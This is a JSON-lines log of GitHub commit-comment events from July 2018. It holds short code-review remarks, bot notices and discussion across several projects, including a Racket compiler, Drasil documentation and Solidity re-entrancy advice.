{"id":"7938862811","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pygments_anyscript-feedstock"},"payload":{"comment":{"id":29644736,"position":null,"line":null,"path":null,"commit_id":"bb38492de59c8669e65b1172621e802330f4872d","created_at":"2018-07-09T16:53:25Z","updated_at":"2018-07-09T16:53:25Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mateisarivan, @kasperprasmussen were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @mateisarivan, @kasperprasmussen were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T16:53:25Z"}
{"id":"7938864360","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644743,"position":null,"line":null,"path":null,"commit_id":"59415d099d5e4de2aa78ba7479de54e06eff5e23","created_at":"2018-07-09T16:53:42Z","updated_at":"2018-07-09T16:53:42Z","author_association":"COLLABORATOR","body":"Hello @szymczdm,\r\nI have a problem here. I don't figure out why it build failed in this remote repo, it made successfully on my local machine. This commits includes the previous three commits all didn't work. Could you take a look cause I don't really know what happen in stack. Thanks."}},"created_at":"2018-07-09T16:53:42Z"}
{"id":"7938864832","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29644744,"position":66,"line":105,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-09T16:53:47Z","updated_at":"2018-07-09T16:53:47Z","author_association":"NONE","body":"\"methods that give targets a chance ...\" - it's a mouthful. Yes, there is lot of theory, technique and optionality mixed up here. \r\n\r\n> transfer control as late in the contract as possible\r\n\r\nExactly last in line. Get all aspects of the contract state in order first. The only acceptable \"after\" operation that springs to mind is `return`. \r\n\r\nRe-entry is about the \"target\" to which flow control has been transferred re-entering _your_ contract in an unexpected way. All kinds of illogical/unintended results are possible. There is a video demonstration of this in action coming up. Main takeaway ... if the state is in order first then you are not vulnerable. \r\n\r\nUnderstand that we err on the side of caution here. You, I, we, may not be clever enough to demonstrate the weakness in every contract in every case but we stick to the safe pattern. \r\n\r\nIn case the target is another contract that emits events, you will get added benefit of event logs that make sense chronologically, whereas the unsafe pattern also has the effect of making things seem out of order. You can play with that to see what I mean. \r\n\r\n> So, I don't see many cases where i'd actually write revert code then, since:\r\n1 - they happen automatically on transfer failure, and...\r\n\r\nI overlooked `delegateCall` which return `false` in case there was an error. You need to check. The heuristic is meant to keep you on track regardless of current or future syntax and compiler goodies. _In my opinion_, the sound way to understand `transfer` is that it's a `send` with `if` and `revert` in one readable method. You should still understand the underlying principle so you can think clearly about what's going on when `transfer's` automagical stuff isn't exactly what you need. "}},"created_at":"2018-07-09T16:53:47Z"}
{"id":"7938867443","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"greenkeeperio/greenkeeper-lockfile"},"payload":{"comment":{"id":29644754,"position":63,"line":56,"path":"ci-services/jenkins.js","commit_id":"464007d2730372675172dcf394cd6e33d5ca3be7","created_at":"2018-07-09T16:54:16Z","updated_at":"2018-07-09T16:54:16Z","author_association":"NONE","body":"(env.GH_TOKEN) {\r\n    if (remote.slice(0, 5)"}},"created_at":"2018-07-09T16:54:16Z"}
{"id":"7938868242","type":"CommitCommentEvent","actor":{"login":"wacamoe"},"repo":{"name":"mopub/mopub-ios-mediation"},"payload":{"comment":{"id":29644756,"position":5,"line":22,"path":"Tapjoy/TapjoyAdvancedBidder.m","commit_id":"0b1ac46053ff390a3221dfe63de0da5030e3de7e","created_at":"2018-07-09T16:54:25Z","updated_at":"2018-07-09T16:54:25Z","author_association":"NONE","body":"Convo ongoing in https://jira.twitter.biz/browse/ADF-3610"}},"created_at":"2018-07-09T16:54:25Z"}
{"id":"7938872503","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29644763,"position":66,"line":105,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-09T16:55:13Z","updated_at":"2018-07-09T16:55:13Z","author_association":"NONE","body":"It goes. \r\n1. Optimistic accounting. \r\n2. Try it and check. \r\n3. Revert step 1 on failure. You may indeed want to press on in some cases (instead of erroring out) so you would manually put the state back to the pre-attempt values. \r\n"}},"created_at":"2018-07-09T16:55:13Z"}
{"id":"7938877435","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644780,"position":24,"line":35,"path":"code/Language/Drasil/SentenceExtract.hs","commit_id":"6a447f0ea6b4ebf032201ebeec6be4a515ed046e","created_at":"2018-07-09T16:56:10Z","updated_at":"2018-07-09T16:56:10Z","author_association":"COLLABORATOR","body":"Changes were made in 6a508bc9c209645c3e7685088d17e6e24cbc8ac1. I added the comment for `isVar` function to explain why we need this function. If it still doesn't make sense or needs to be improved, please let me know.  "}},"created_at":"2018-07-09T16:56:10Z"}
{"id":"7938880448","type":"CommitCommentEvent","actor":{"login":"JustArchi"},"repo":{"name":"weakiwi/ArchiSteamFarm"},"payload":{"comment":{"id":29644787,"position":3,"line":3,"path":"ArchiSteamFarm/out-win-x64/config/weakiwi.json","commit_id":"fa7d1bcce582cb192150aaf6867a0e1b546c0d9e","created_at":"2018-07-09T16:56:45Z","updated_at":"2018-07-09T16:56:45Z","author_association":"NONE","body":"You might want to change your password 🙂"}},"created_at":"2018-07-09T16:56:45Z"}
{"id":"7938880826","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29644788,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T16:56:49Z","updated_at":"2018-07-09T16:56:49Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T16:56:49Z"}
{"id":"7938882489","type":"CommitCommentEvent","actor":{"login":"zmonteca"},"repo":{"name":"GuloSolutions/up4-personalization"},"payload":{"comment":{"id":29644791,"position":null,"line":null,"path":null,"commit_id":"dea8eec26e65dfc33f138ab95bf3c521d73d4a26","created_at":"2018-07-09T16:57:12Z","updated_at":"2018-07-09T16:57:12Z","author_association":"CONTRIBUTOR","body":"@RadBoris This is fine, however, why don't you make this a little smarter so we can toggle this debugging on and off. Otherwise when we're done with this, we have to remove all this code and it's just sloppy. I think in general, you get starting thinking about logging in better ways so when problems arise we can turn these things on and off to get more verbose information when we need it.\r\n\r\nOnce that's done, update the tag and we can roll it out."}},"created_at":"2018-07-09T16:57:12Z"}
{"id":"7938885067","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29644797,"position":48,"line":1118,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"1514d32e3d926af7e7bde94fcb81cf4a61323db3","created_at":"2018-07-09T16:57:42Z","updated_at":"2018-07-09T16:57:42Z","author_association":"OWNER","body":"@samm82, yes, this should be a new issue.  The SRS has been updated recently.  You should compare to the new version.  Please create an issue that highlights the differences and we'll make an effort to get the Drasil version to match.  You should assign the issue to me as a reviewer and then I can reassign it to you when we are ready to do the changes."}},"created_at":"2018-07-09T16:57:42Z"}
{"id":"7938885134","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29644798,"position":null,"line":null,"path":null,"commit_id":"75122d9059c850d71c00bcc40605ae95cc1c5999","created_at":"2018-07-09T16:57:43Z","updated_at":"2018-07-09T16:57:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T16:57:43Z"}
{"id":"7938887719","type":"CommitCommentEvent","actor":{"login":"bpteague"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":29644803,"position":null,"line":null,"path":null,"commit_id":"73d7710613e26c3d59212e9e031f41a916c1e892","created_at":"2018-07-09T16:58:16Z","updated_at":"2018-07-09T16:58:16Z","author_association":"CONTRIBUTOR","body":"Prior to Python v3.4, multiprocessing was only available in \"fork\" mode on Linux and OSX, and \"spawn\" mode on Windows (because Windows doesn't have a fork() method.)\r\n\r\nFrom Python 3.4 onwards, \"spawn\" mode is also supported on Linux and OSX, and occasionally there is a good reason to use it.  Because I couldn't identify any side effects from monkey-patching forking.Popen, I patched it on all platforms. \r\n\r\nHowever, these versions of Python also spawn other processes, the semaphore tracker and the fork server, which need special handling."}},"created_at":"2018-07-09T16:58:16Z"}
{"id":"7938890702","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29644815,"position":null,"line":null,"path":null,"commit_id":"c6f1c8bf1fcf0edf1e07d3db32391e7875b861d3","created_at":"2018-07-09T16:58:51Z","updated_at":"2018-07-09T16:58:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-303](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-303).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-303-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T16:58:51Z"}
{"id":"7938898710","type":"CommitCommentEvent","actor":{"login":"yudian1994"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29644842,"position":null,"line":null,"path":null,"commit_id":"dc935abee103d61f238eeec58abe2904c2628574","created_at":"2018-07-09T17:00:28Z","updated_at":"2018-07-09T17:00:28Z","author_association":"NONE","body":"It still does not work"}},"created_at":"2018-07-09T17:00:28Z"}
{"id":"7938900847","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644848,"position":null,"line":null,"path":null,"commit_id":"de1efc50088aa6e16eff63d7dd313d013f46be25","created_at":"2018-07-09T17:00:53Z","updated_at":"2018-07-09T17:00:53Z","author_association":"COLLABORATOR","body":"Ok. This issue is referencing #696. After we figured out we need a new and correct definition for htTransCoeff_min, I redefined it and now it is collected correctly in table. `removeItem` was a hack function for testing, and now has been removed."}},"created_at":"2018-07-09T17:00:53Z"}
{"id":"7938902239","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29644852,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-09T17:01:10Z","updated_at":"2018-07-09T17:01:10Z","author_association":"MEMBER","body":"[In the long run, It'd probably pay off to get rid of magic symbols altogether and parse the sections from the binary headers; druntime provides what's needed AFAIK.]"}},"created_at":"2018-07-09T17:01:10Z"}
{"id":"7938907473","type":"CommitCommentEvent","actor":{"login":"yudian1994"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29644859,"position":null,"line":null,"path":null,"commit_id":"fdff4776c05af46a00915d82c330eee14537e950","created_at":"2018-07-09T17:02:11Z","updated_at":"2018-07-09T17:02:11Z","author_association":"NONE","body":"still does not reduce the target's speed"}},"created_at":"2018-07-09T17:02:11Z"}
{"id":"7938912334","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644880,"position":null,"line":null,"path":null,"commit_id":"377f608ab59be1a46d414927b82763289061d581","created_at":"2018-07-09T17:03:13Z","updated_at":"2018-07-09T17:03:13Z","author_association":"COLLABORATOR","body":"Sorry that I didn't see this comment on time. Changes were made in 8c1738588678f66ed29a6da31c4b7a6f243eaabe."}},"created_at":"2018-07-09T17:03:13Z"}
{"id":"7938917479","type":"CommitCommentEvent","actor":{"login":"System-rat"},"repo":{"name":"System-rat/backup-rat"},"payload":{"comment":{"id":29644887,"position":null,"line":null,"path":null,"commit_id":"eaff13406493995dc64bedacbc934c9956ca8acb","created_at":"2018-07-09T17:04:18Z","updated_at":"2018-07-09T17:04:18Z","author_association":"OWNER","body":"This was an accident... whoops."}},"created_at":"2018-07-09T17:04:18Z"}
{"id":"7938918260","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644890,"position":33,"line":205,"path":"compile.rkt","commit_id":"028cda31a870a8e0c7d45c8c0a7d7d382663f0cd","created_at":"2018-07-09T17:04:28Z","updated_at":"2018-07-09T17:04:28Z","author_association":"OWNER","body":"You need to remember this fun name for later. Also, don't use `gensym` at all. There's that other function"}},"created_at":"2018-07-09T17:04:28Z"}
{"id":"7938919136","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644892,"position":null,"line":null,"path":null,"commit_id":"fac6fec03bb956fa28dfe15ad0c6a81afba19fc3","created_at":"2018-07-09T17:04:40Z","updated_at":"2018-07-09T17:04:40Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4422)*\n"}},"created_at":"2018-07-09T17:04:40Z"}
{"id":"7938920626","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644900,"position":34,"line":206,"path":"compile.rkt","commit_id":"028cda31a870a8e0c7d45c8c0a7d7d382663f0cd","created_at":"2018-07-09T17:04:59Z","updated_at":"2018-07-09T17:04:59Z","author_association":"OWNER","body":"`ret-lab` is the jump label. `ret-x` is the name of the return variable"}},"created_at":"2018-07-09T17:04:59Z"}
{"id":"7938922956","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644906,"position":35,"line":207,"path":"compile.rkt","commit_id":"028cda31a870a8e0c7d45c8c0a7d7d382663f0cd","created_at":"2018-07-09T17:05:29Z","updated_at":"2018-07-09T17:05:29Z","author_association":"OWNER","body":"The body needs to know how to access the arguments"}},"created_at":"2018-07-09T17:05:29Z"}
{"id":"7938926628","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644919,"position":12,"line":14,"path":"compile.rkt","commit_id":"028cda31a870a8e0c7d45c8c0a7d7d382663f0cd","created_at":"2018-07-09T17:06:16Z","updated_at":"2018-07-09T17:06:16Z","author_association":"OWNER","body":"What is the type of this?\r\n\r\nI think you actually want two things: a queue of things to look at later and a mapping from fun to name"}},"created_at":"2018-07-09T17:06:16Z"}
{"id":"7938932090","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644931,"position":23,"line":199,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-09T17:07:25Z","updated_at":"2018-07-09T17:07:25Z","author_association":"OWNER","body":"Sigma is global, I believe, but actually I think you should actually just put this on the queue and then there's a loop at the program level that compiles them (i.e. compile-fun is only called by that loop, never from compile-stmt.)"}},"created_at":"2018-07-09T17:07:25Z"}
{"id":"7938933776","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644935,"position":null,"line":null,"path":null,"commit_id":"363cb07cbc952e154f65173c9eb5455e4107dc41","created_at":"2018-07-09T17:07:48Z","updated_at":"2018-07-09T17:07:48Z","author_association":"COLLABORATOR","body":"I will list all the symbols has been removed:\r\nIn SWHS case:\r\nq | Heat flux | W/m2\r\n\r\nIn SSP case:\r\nK_no | Normal Stiffness: residual strength | Pa/m\r\nK_tr | Shear Stiffness: residual strength | Pa/m\r\n\r\nIn NoPCM case:\r\nC_L | Specific heat capacity of a liquid | J/(kg⋅°C)\r\nq | Heat flux | W/m2\r\nτ | Dummy variable for integration over time | s\r\n\r\nIn GamePhysics case:\r\n\r\nî | Horizontal Unit Vector | m\r\nI_k| Moment of Inertia Of the K-Th Rigid Body | kg⋅m2\r\nJ | Impulse (vector) | N⋅s\r\nĵ | Vertical Unit Vector | m\r\nm_i | Mass Of the I-Th Rigid Body | kg\r\nn | Number of particles in a rigid body\r\nr | Distance | m\r\nrAP | Displacement vector between the centre of mass of rigid body A and contact point P | m\r\nrBP | Displacement vector between the centre of mass of rigid body B and contact point P | m\r\nrkP | Displacement vector between the centre of mass of rigid body k and contact point P | m\r\nt0 | Denotes the initial time | s\r\n\r\nAll symbols above were removed because the automatic collecting didn't catch them and I did manual check. All of them doesn't appear in document.\r\n\r\nThere is only one exception is \"pi\". Pi doesn't have a definition, so it isn't shown up in the list.\r\n\r\n@smiths I did check them in old stable version more than once which is the version I didn't touch and modify and they are not there. But I didn't match them with manual version. You want me do that? But I feel many unitals were changed from manual to stable."}},"created_at":"2018-07-09T17:07:48Z"}
{"id":"7938934220","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644936,"position":26,"line":202,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-09T17:07:53Z","updated_at":"2018-07-09T17:07:53Z","author_association":"OWNER","body":"It may already have a name if specified at the program level"}},"created_at":"2018-07-09T17:07:53Z"}
{"id":"7938936183","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644939,"position":26,"line":202,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-09T17:08:18Z","updated_at":"2018-07-09T17:08:18Z","author_association":"OWNER","body":"I think that means that global name information needs to be exposed down to here"}},"created_at":"2018-07-09T17:08:18Z"}
{"id":"7938939767","type":"CommitCommentEvent","actor":{"login":"nicksavov"},"repo":{"name":"OSTraining/OSMap"},"payload":{"comment":{"id":29644947,"position":null,"line":null,"path":null,"commit_id":"7f4a68bf4a40bf957ae094dfb530645631a7a35a","created_at":"2018-07-09T17:09:04Z","updated_at":"2018-07-09T17:09:04Z","author_association":"COLLABORATOR","body":"Jira ticket: MAP-388"}},"created_at":"2018-07-09T17:09:04Z"}
{"id":"7938940336","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29644951,"position":null,"line":null,"path":null,"commit_id":"b9a44fada1b535f7436b9ed421d2342c9e35d2a4","created_at":"2018-07-09T17:09:10Z","updated_at":"2018-07-09T17:09:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-305](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-305).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-305-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T17:09:10Z"}
{"id":"7938941072","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644953,"position":null,"line":null,"path":null,"commit_id":"9d19f13edc2cda06d6681bb3cf94d12b97f286e5","created_at":"2018-07-09T17:09:19Z","updated_at":"2018-07-09T17:09:19Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4424)*\n"}},"created_at":"2018-07-09T17:09:19Z"}
{"id":"7938942044","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644956,"position":44,"line":219,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-09T17:09:31Z","updated_at":"2018-07-09T17:09:31Z","author_association":"OWNER","body":"It should be a goto & a label just like let/ec. You could even put a let/ec around the body with this name and compile that. Perhaps that means that it shouldn't even be part of the term?"}},"created_at":"2018-07-09T17:09:31Z"}
{"id":"7938942248","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"greenkeeperio/greenkeeper-lockfile"},"payload":{"comment":{"id":29644958,"position":17,"line":13,"path":"ci-services/jenkins.js","commit_id":"464007d2730372675172dcf394cd6e33d5ca3be7","created_at":"2018-07-09T17:09:34Z","updated_at":"2018-07-09T17:09:34Z","author_association":"NONE","body":"+const origBranch = env.CHANGE_TARGET || env.CHANGE_BRANCH || env.BRANCH_NAME || env.GIT_BRANCH;\r\n\t\t+\r\n\t\t+function getGitURL() {\r\n\t\t+  // CHANGE_URL gives us something like: 'https://github.com/owner/repo/pull/4',\r\n\t\t+  // here we convert that to 'https://github.com/owner/repo.git'\r\n\t\t+  if (env.CHANGE_URL) {\r\n\t\t+    const index = env.CHANGE_URL.indexOf('/pull/');\r\n\t\t+    if (index != -1) {\r\n\t\t+      return env.CHANGE_URL.slice(0, index) + '.git';\r\n\t\t+    }"}},"created_at":"2018-07-09T17:09:34Z"}
{"id":"7938944715","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644962,"position":13,"line":194,"path":"compile.rkt","commit_id":"06f95cb5f8661cdd540e69e2f1ec51e840a54cc2","created_at":"2018-07-09T17:10:05Z","updated_at":"2018-07-09T17:10:05Z","author_association":"OWNER","body":"Yes, \"let x : ty = f(as) in bs\" is what Call means"}},"created_at":"2018-07-09T17:10:05Z"}
{"id":"7938944788","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29644963,"position":null,"line":null,"path":null,"commit_id":"6c4e05d2d860b3955ffc537a33e3c325abc7fe00","created_at":"2018-07-09T17:10:06Z","updated_at":"2018-07-09T17:10:06Z","author_association":"NONE","body":"@k0kubun\r\n\r\nMaybe `tmp.each { |t| t.close! }` should be left in, as it deletes the files?  Or change it to unlink or delete?  I suppose 'b' is the only file that exists when the loop is done...\r\n\r\nThanks again, Greg"}},"created_at":"2018-07-09T17:10:06Z"}
{"id":"7938946562","type":"CommitCommentEvent","actor":{"login":"Martinj98"},"repo":{"name":"SupaHotFiya-Security/curcon-backend"},"payload":{"comment":{"id":29644967,"position":null,"line":null,"path":null,"commit_id":"4f2609ed07b45f61c19d326e1f316d85d3475b0d","created_at":"2018-07-09T17:10:28Z","updated_at":"2018-07-09T17:10:28Z","author_association":"NONE","body":"Hibernate leest automatisch import.sql in op database creatie. zie artikel 81.2\r\n\r\nhttps://docs.spring.io/spring-boot/docs/current/reference/html/howto-database-initialization.html"}},"created_at":"2018-07-09T17:10:28Z"}
{"id":"7938947484","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29644971,"position":null,"line":null,"path":null,"commit_id":"db052ddef8648331cd20d058aefefd86857de482","created_at":"2018-07-09T17:10:39Z","updated_at":"2018-07-09T17:10:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-35](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-35-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T17:10:39Z"}
{"id":"7938948874","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644975,"position":null,"line":null,"path":null,"commit_id":"436d58a0b931a75b091f00380424d8bc4dc30173","created_at":"2018-07-09T17:10:56Z","updated_at":"2018-07-09T17:10:56Z","author_association":"COLLABORATOR","body":"This hack has been removed."}},"created_at":"2018-07-09T17:10:56Z"}
{"id":"7938948985","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29644976,"position":32,"line":248,"path":"compile.rkt","commit_id":"06f95cb5f8661cdd540e69e2f1ec51e840a54cc2","created_at":"2018-07-09T17:10:58Z","updated_at":"2018-07-09T17:10:58Z","author_association":"OWNER","body":"These names need to be available everywhere and you should just make the things it points to as the initial contents of the queue"}},"created_at":"2018-07-09T17:10:58Z"}
{"id":"7938949432","type":"CommitCommentEvent","actor":{"login":"razum2um"},"repo":{"name":"shamcode/simple-ci"},"payload":{"comment":{"id":29644978,"position":null,"line":null,"path":null,"commit_id":"26312121d745e3d3c965ed5ddce083febaac4460","created_at":"2018-07-09T17:11:04Z","updated_at":"2018-07-09T17:11:04Z","author_association":"NONE","body":"@shamcode ты прям ловишь мои мысли, загляни в вк %)"}},"created_at":"2018-07-09T17:11:04Z"}
{"id":"7938952356","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644988,"position":null,"line":null,"path":null,"commit_id":"7a90e47f440653229144c08544f495899051f0a1","created_at":"2018-07-09T17:11:39Z","updated_at":"2018-07-09T17:11:39Z","author_association":"COLLABORATOR","body":"Comment were added."}},"created_at":"2018-07-09T17:11:39Z"}
{"id":"7938953602","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644989,"position":null,"line":null,"path":null,"commit_id":"0168ce1403af5ee7ccf452d87a127a3846d2c4c3","created_at":"2018-07-09T17:11:54Z","updated_at":"2018-07-09T17:11:54Z","author_association":"COLLABORATOR","body":"This has been fixed."}},"created_at":"2018-07-09T17:11:54Z"}
{"id":"7938954905","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644992,"position":null,"line":null,"path":null,"commit_id":"0131ead76183325ac8dc4a8f2356d32de34756f4","created_at":"2018-07-09T17:12:11Z","updated_at":"2018-07-09T17:12:11Z","author_association":"COLLABORATOR","body":"Comment was added."}},"created_at":"2018-07-09T17:12:11Z"}
{"id":"7938962617","type":"CommitCommentEvent","actor":{"login":"arnobaer"},"repo":{"name":"arnobaer/hls4gtl-fork"},"payload":{"comment":{"id":29645006,"position":6,"line":4,"path":"tb/algos_test_4_c_cosim.cpp","commit_id":"831a18877a44b0967b604443b7234c0579c3bdec","created_at":"2018-07-09T17:13:43Z","updated_at":"2018-07-09T17:13:43Z","author_association":"OWNER","body":"Including external/library headers after local headers is a good way to prevent magic auto-includes (in this case `stdio.h` is exposed to `requirements.h` and `algos.h` too, but only from within the test bench)."}},"created_at":"2018-07-09T17:13:43Z"}
{"id":"7938963352","type":"CommitCommentEvent","actor":{"login":"nstrayer"},"repo":{"name":"nstrayer/activity_detection_post"},"payload":{"comment":{"id":29645012,"position":null,"line":null,"path":null,"commit_id":"2920686de84cd4192a38535e538c58b646026271","created_at":"2018-07-09T17:13:52Z","updated_at":"2018-07-09T17:13:52Z","author_association":"OWNER","body":"These are all wonderful -- I appreciate it! "}},"created_at":"2018-07-09T17:13:52Z"}
{"id":"7938970903","type":"CommitCommentEvent","actor":{"login":"natemcmaster"},"repo":{"name":"aspnet/BuildTools"},"payload":{"comment":{"id":29645048,"position":null,"line":null,"path":null,"commit_id":"cf98b00a7a655d8c6e23fa2336e091d64fc8be28","created_at":"2018-07-09T17:15:21Z","updated_at":"2018-07-09T17:15:21Z","author_association":"MEMBER","body":"cc @Tratcher "}},"created_at":"2018-07-09T17:15:21Z"}
{"id":"7938972278","type":"CommitCommentEvent","actor":{"login":"webbestmaster"},"repo":{"name":"webbestmaster/ae3"},"payload":{"comment":{"id":29645052,"position":null,"line":null,"path":null,"commit_id":"b038a3c366aa91b539b4ab6fa28c0843fcb99641","created_at":"2018-07-09T17:15:39Z","updated_at":"2018-07-09T17:15:39Z","author_association":"OWNER","body":"nice commit!"}},"created_at":"2018-07-09T17:15:39Z"}
